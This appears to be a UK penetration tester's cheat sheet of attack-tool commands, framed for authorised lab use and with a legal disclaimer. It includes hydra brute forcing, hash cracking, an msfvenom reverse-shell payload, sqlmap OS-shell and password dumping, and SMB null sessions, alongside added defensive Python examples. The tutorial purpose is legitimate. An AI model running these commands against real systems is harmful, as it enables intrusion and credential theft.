The following is a list of useful command line tools that I’ve begun to use for simple penetration testing. IMPORTANT: Please read the notes below before proceeding.
Before using any of these tools you should ensure that you have explicit permission to do so. I ONLY use these tools on my own air gapped network or against challenge sites (such as Hack The Box) where I am an authorised user. Using these tools against targets for which you DO NOT have explicit permission almost certainly constitutes an offence under the Computer Misuse Act 1990 (UK). There is simply no excuse for doing so when legitimate penetration testing and coding sites are available, many of which are free. Don’t waste your life and prospects on cyber crime – you will eventually make a mistake and get caught, no matter how good you think you are. Remember that if you have services hosted by a third party then you DO NOT have explicit permission to use these tools against your services without the consent of the host.
Some people believe that these techniques should not be published as it makes things easier for wannabe cyber criminals. The fact is that unless there is a global initiative to censor such material from the internet, this is simply not practical. Nothing I have published below is a secret: all of these tools have been around for a while and searching for any one of them will return pages and pages of instruction. The legitimate purpose of these tools is to test systems for vulnerabilities so that they can be target hardened against criminals – and that is the context in which I produce them below. If you are concerned about the vulnerability of your systems to any of these tools, then you should consider employing a qualified penetration tester to provide you with an analysis and recommendations of how you can improve your security.
If you already know that you have vulnerabilities in your systems, you should fix those before employing a penetration tester. Most basic systems can be secured by good cyber awareness and discipline, patch management and up to date anti-malware suites.
ARP – Address Resolution Protocol
Maps IP addresses to MAC addresses
Identifies hosts on a network
arp-scan 192.168.3.0/24 192.168.45.0/24 #identifies live hosts on the 192.168.3.0/24 and 192.168.45.0/24 ranges
Brute Force Tools
hydra – versatile online brute force tool for many services
hydra -l root -P /path/dictionary.txt mysql://192.168.3.100 #Brute force the mysql user root on the target using dictionary passwords
hydra -l postgres -P /path/dict.txt postgres://192.168.3.100 #Brute force the postgres user on the target using passwords from dict.txt
hydra -l bob -P /path/dict.txt -s 22 192.168.3.100 -t4 ssh #Brute force the ssh service for user bob on port 22 using passwords from dict.txt, with 4 parallel tasks
dirsearch and gobuster – tools for locating hidden/unknown files and directories
python3 dirsearch.py -u http://10.10.10.28 -e php #Scans for common directory names, looking for php files
gobuster dir -u http://10.10.10.29/ -w /usr/share/wordlists/dirb/common.txt #scans target for directories in the wordlist common.txt
gobuster dir -u http://10.10.10.191 -w dir.txt -x txt -b 403,404 --wildcard #scans target for directories and txt files using wildcard, excluding 403 and 404 http errors from output
hash-identifier #Prompts for a hash, then identifies the possible algorithms
#Always internet search hashes before resorting to cracking
Offline brute force tools and utilities
cewl – spider that creates a wordlist based on a website
cewl -d 2 -m 5 -w wordlist.txt https://example.com #generates wordlist.txt by spidering example.com to a depth of two, with a minimum word length of 5
hashcat – offline hash cracking tool
hashcat -m0 -a0 hashlist.txt /path/dict.txt --quiet #Dictionary attack (-a0) on hashlist.txt, treating the entries as MD5 (-m0), using dict.txt
#Always internet search hashes before resorting to cracking
john (John the Ripper) – versatile offline cracking tool
# john stores already cracked passwords. Use --show to display them or --pot=file to override the pot file
#password_hashes in this instance is derived from unshadow
#hashes_win7 is a Windows hashdump (eg from Metasploit)
john --single password_hashes #Mangles user data (single crack mode) and compares hashes looking for matches
john -w=/path/dict.txt password_hashes #Runs a dictionary attack against password_hashes using dict.txt
john --format=NT --wordlist=/path/dict.txt hashes_win7 #Runs a dictionary attack against the Windows hashdump using dict.txt
#Always internet search hashes before resorting to cracking
unshadow – creates john compatible files from Linux data
#Requires the Linux /etc/passwd and /etc/shadow files
unshadow passwd shadow > password_hashes #combines the passwd/shadow files and provides a list of hashes compatible with john
zip2john – extracts hashes from password protected zip files
zip2john backup.zip > hash #extracts the password hash from a password protected zip
#Always internet search hashes before resorting to cracking
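The hash cracking entries above (hashcat -m0 -a0 and the john dictionary modes) all rely on the same property: an unsalted hash can be attacked in bulk. As an added Python example that is not part of the original post, this runs one constructed dictionary against unsalted MD5 and against per-user salted PBKDF2, counting the hash operations each needs, to show why the storage format matters far more than the wordlist.

```python
import hashlib

# Constructed sample data (not from the original post): a small dictionary
# and a hash list of the kind hashcat -m0 -a0 would be pointed at.
DICT = ["password", "letmein", "summer2020", "hunter2", "admin123"]

def md5_hex(word: str) -> str:
    return hashlib.md5(word.encode()).hexdigest()

# Three targets: two are in the dictionary, the third is not.
UNSALTED_HASHES = [md5_hex("hunter2"), md5_hex("letmein"), md5_hex("correct-horse-battery")]

def crack_unsalted(hashes, words):
    """Dictionary attack on unsalted hashes: each candidate word is hashed
    once and checked against ALL targets at the same time, so the cost is
    len(words) no matter how long the hash list is. Returns (cracked, ops)."""
    targets = set(hashes)
    cracked, ops = {}, 0
    for w in words:
        ops += 1
        h = md5_hex(w)
        if h in targets:
            cracked[h] = w
    return cracked, ops

def pbkdf2_hex(word: str, salt: bytes, iterations: int) -> str:
    return hashlib.pbkdf2_hmac("sha256", word.encode(), salt, iterations).hex()

ITER = 1000  # deliberately low so the demo runs instantly; real deployments use far more
SALTED_RECORDS = [(salt, pbkdf2_hex(pw, salt, ITER))
                  for pw, salt in [("hunter2", b"s1"), ("letmein", b"s2"),
                                   ("correct-horse-battery", b"s3")]]

def crack_salted(records, words, iterations=ITER):
    """Same dictionary against salted PBKDF2: every word must be re-hashed
    for every salt, so the cost is len(words) * len(records), and each hash
    is `iterations` times slower than a single MD5. Returns (cracked, ops)."""
    cracked, ops = {}, 0
    for salt, h in records:
        for w in words:
            ops += 1
            if pbkdf2_hex(w, salt, iterations) == h:
                cracked[h] = w
    return cracked, ops
```

Both runs recover the same two weak passwords, but the salted run costs 15 slow hashes against 5 fast ones, and the gap grows linearly with the number of users.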
msfvenom – companion payload generator for the Metasploit Framework
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -o phone_home.php #Generates a php payload that calls back to LHOST on port 4444 and spawns a meterpreter shell. Create a listener in MSFConsole, upload the payload to the target, then navigate to the payload file in a browser.
nmap – highly versatile port scanning tool with added functionality in the form of the scripting engine, which can additionally report vulnerabilities.
nmap -sS -sV -nvv -O 192.168.3.0/24 -oA tcp_result #half-open (SYN) TCP scan; check service versions; DNS resolution OFF; verbosity medium; detect OS; on range 192.168.3.0/24; output in all 3 formats, file prefix tcp_result
nmap -sU -F -nvv 192.168.3.0/24 192.168.45.0/24 -oA udp_result #UDP scan; Fast (top 100 ports); medium verbosity; two target ranges; output in all 3 formats, file prefix udp_result
nmap -p- --min-rate=1000 -T4 10.10.10.27 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$// #full port scan, returns only the open port numbers as a comma separated list. This is useful for Hack The Box when set to a variable which is rescanned, as the return is nicely formatted and uncluttered.
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.27 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) #the command above, captured into a variable
nmap -sC -sV -p$ports 10.10.10.27 #Scan focused on the known open ports, with default scripts and version detection
grep --color 22/open/tcp *.gnmap #search nmap greppable results for open port 22 (SSH)
SNMP – Simple Network Management Protocol
- Default port – 161.
- Versions 1 and 2c offer no authentication or encryption.
- Default community strings: public, private
grep --color 161/open/udp *.gnmap #Searches all gnmap files and highlights the pattern 161/open/udp, ie searches nmap scans for the default SNMP port
nmap scripting engine
nmap -sU -nvv -p161 --script snmp-brute 192.168.3.100 --script-args snmp-brute.communitiesdb=/path/dictionary.txt #run the snmp-brute script against the target using the dictionary of community strings
#The results can be searched for useful information such as usernames
onesixtyone – tool that can be used to brute force community strings.
onesixtyone -c /path/dictionary.txt 192.168.3.100 #Scan target for community strings found in the dictionary file
snmpwalk – walks the MIB tree of a device using a known community string.
snmpwalk -v 1 -c community 192.168.3.100 #use SNMP version 1 and walk the target using the community string "community"
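The nmap section and the SNMP section both fall back on grepping .gnmap files for patterns such as 161/open/udp. As an added Python example that is not part of the original post, here is a small parser for nmap's greppable output that returns the comma separated open-port list the -p- pipeline produces and flags hosts exposing the services this post notes as weak by default (SNMP v1/2c, SMB and NetBIOS); the scan output is constructed.

```python
import re
from collections import namedtuple

Service = namedtuple("Service", "host port proto state name")

# Constructed sample of nmap greppable output (-oA writes it as *.gnmap); not from the post.
SAMPLE_GNMAP = """\
# Nmap scan initiated as: nmap -sS -sV -nvv -O 192.168.3.0/24 -oA tcp_result
Host: 192.168.3.11 ()\tStatus: Up
Host: 192.168.3.11 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///\tIgnored State: closed (997)
Host: 192.168.3.100 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.9/, 161/open/udp//snmp///, 3306/filtered/tcp//mysql///\tIgnored State: closed (997)
# Nmap done -- 2 IP addresses (2 hosts up) scanned
"""

# port/state/protocol/owner/service/rpcinfo/version/  (owner and rpcinfo are usually empty)
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)//")

def parse_gnmap(text):
    """Return one Service record per port entry in a .gnmap file."""
    services = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for port, state, proto, name in PORT_RE.findall(ports_field):
            services.append(Service(host, int(port), proto, state, name))
    return services

def hosts_with_open(services, port, proto):
    """Structured equivalent of `grep 161/open/udp *.gnmap`."""
    return sorted({s.host for s in services
                   if s.port == port and s.proto == proto and s.state == "open"})

def open_port_list(services, host):
    """Comma separated open ports for one host, as the -p- | grep | cut pipeline returns."""
    ports = sorted(s.port for s in services if s.host == host and s.state == "open")
    return ",".join(str(p) for p in ports)

# Services the post singles out as weak by default; a defender wants these listed first.
WATCHLIST = {(161, "udp"): "SNMP: confirm v3 only and no default community strings",
             (445, "tcp"): "SMB: check null sessions and RID enumeration are blocked",
             (139, "tcp"): "NetBIOS session service (deprecated): disable if unused"}

def review_exposure(services):
    return [(s.host, s.port, WATCHLIST[(s.port, s.proto)]) for s in services
            if s.state == "open" and (s.port, s.proto) in WATCHLIST]
```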
SQL – Structured Query Language
There are several deployments of SQL, such as MySQL, PostgreSQL and MSSQL, each with different default ports and credentials.
mssqlclient.py (Impacket) – used to establish a remote connection to an MSSQL server
mssqlclient.py ARCHETYPE/sql_svc@TARGET_IP -windows-auth #establishes a remote connection to the MSSQL server at TARGET_IP (placeholder), where ARCHETYPE/sql_svc is the user
sqlmap – tool for detecting vulnerabilities in SQL deployments, which can be used to automate SQL injection. Where the database is accessible through a web application, the Referer URL and Cookie should be captured using Burp Suite or HTTP Tracker, eg:
Cookie: security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989
sqlmap -d postgres://user:password@TARGET_IP:5432/postgres --os-shell #Connect directly (credentialled) to database postgres over the postgres service on port 5432 as user/password, and attempt to spawn an OS shell (TARGET_IP is a placeholder)
sqlmap -u "http://10.10.10.46/dashboard.php?search=a" --cookie="PHPSESSID=cookie" --os-shell #Attempts to obtain an OS shell through the injectable search parameter
sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" -b --current-db --current-user #Assesses vulnerability and provides the DBMS banner, current database name and user
sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" --string="Surname" --users --password #Extracts database management system users and passwords (hashes)
sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" -U only_me --privileges #List privileges of a specified database management system user (only_me)
sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" --dbs #Obtain a list of all databases
sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" -D noobot --tables #Obtain a list of tables in the specified database (noobot)
sqlmap -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" -D noobot -T users --columns #Obtain a list of columns in the specified table (users) in the specified database (noobot)
sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" -D noobot -T users -C user,password --dump #Dump the contents of the specified columns (user, password) from the specified table (users) in the specified database (noobot)
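The bug class sqlmap is probing for in the ?id=1 requests above, as an added Python example that is not part of the original post: the id value spliced straight into the query, beside the parameterised form that a developer should ship instead. The table, rows and the sqlite3 backend are constructed for the demo; the behaviour is the same on MySQL, PostgreSQL or MSSQL.

```python
import sqlite3

def make_db():
    """Constructed sample table mirroring the ?id=1 lookup sqlmap is pointed at."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, user TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "alice", "hash_a"), (2, "bob", "hash_b"), (3, "only_me", "hash_c")])
    return con

def lookup_vulnerable(con, user_id: str):
    """The defect sqlmap detects: the request parameter becomes part of the
    SQL text, so anything after the digits is executed as SQL. A boolean
    tail such as `1 AND 1=2` flips the result set, which is exactly the
    true/false differential sqlmap's boolean-based detection looks for."""
    sql = "SELECT user FROM users WHERE id = " + user_id
    return [row[0] for row in con.execute(sql)]

def lookup_fixed(con, user_id: str):
    """Hardened form: validate the type, then bind the value as a parameter
    so the query's structure can never be changed by the request."""
    if not user_id.isdigit():
        raise ValueError("id must be numeric")
    rows = con.execute("SELECT user FROM users WHERE id = ?", (int(user_id),))
    return [row[0] for row in rows]

def probe(con, value: str):
    """Return (vulnerable_result, fixed_result) for one request value;
    the fixed path reports 'rejected' instead of raising."""
    vuln = lookup_vulnerable(con, value)
    try:
        fixed = lookup_fixed(con, value)
    except ValueError:
        fixed = "rejected"
    return vuln, fixed
```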
Web App Scanners
nikto – web server scanner
nikto -host http://192.168.56.101/noobot #Provides a scan that includes references to the Open Source Vulnerability Database (OSVDB)
Windows/SMB enumeration
- Default ports: 135 (RPC), 137 (NetBIOS name service), 139 (NetBIOS session service, deprecated), 445 (SMB)
- RIDs: 500 (Administrator), 501 (Guest), 502 (krbtgt (Kerberos)), 1000+ users
- Common techniques for Windows enumeration are Null Session and RID cycling using enum4linux -r
enum4linux -a 192.168.3.11 #Can identify workgroups, domains (and controllers), users and shares
enum4linux -a -u user -p password -R 1100-1200 192.168.3.11 #Credentialled RID scan in the range 1100-1200
net (credentialled Windows)
Display group membership information
net group "Domain Admins" /domain #Identifies Domain Admin accounts
smbclient – SMB enumeration and share mounting
smbclient -N -L \\\\10.10.10.27\\ #List available shares with a null session (look for those which are not $ admin shares)
smbclient -N \\\\10.10.10.27\\backups #Attempts to connect to the share "backups" - if successful, results in an smb prompt from which commands such as get and dir work
WordPress – popular site platform; manual enumeration recovers the /blog path and /readme.html, which provides the version.
wpscan – WordPress enumeration tool.
wpscan --url http://192.168.3.110/blog/ #Enumerates the WordPress install for known vulnerabilities